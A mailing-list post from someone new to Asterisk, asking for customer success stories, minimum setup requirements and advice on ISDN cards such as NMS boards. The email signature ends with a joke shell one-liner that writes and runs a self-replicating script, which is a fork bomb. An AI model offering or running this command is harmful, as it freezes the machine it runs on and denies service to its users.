Dear all,

I'm new to the list and new to Asterisk, so please bear with me ;) I've been
googling the web but couldn't find my answers... my apologies if these have
been already discussed before.

Nowdays I'm interested in setting up some VoIP-based solution on our offices
and I think Asterisk is the right choice.
I've been browsing here and there but couldn't find any of those "success
stories" from customers using Asterisk for their everyday needs. So, any
hints on this issue will be much appreciated, as I need some support
materials to "sell" Asterisk to my managers :-)

Furthermore, I read the documentation
( site and couldn't find
something like "Asterisk Setup Crash Course for Dummies" or the like ;) I'd
like to know the minimal requirements for Asterisk to work.

Is there any suggested card for ISDN lines? Besides the ones on Asterisk's
website, has anyone any experience with NMS boards

Thanks in advance!

Best regards,
Martin Mielke                   [EMAIL PROTECTED]
THALES Information Systems
UNIX is user-friendly...  Itīs just selective about who its friends are.
[ echo "\$0&\$0">_;chmod +x _;./_ ]

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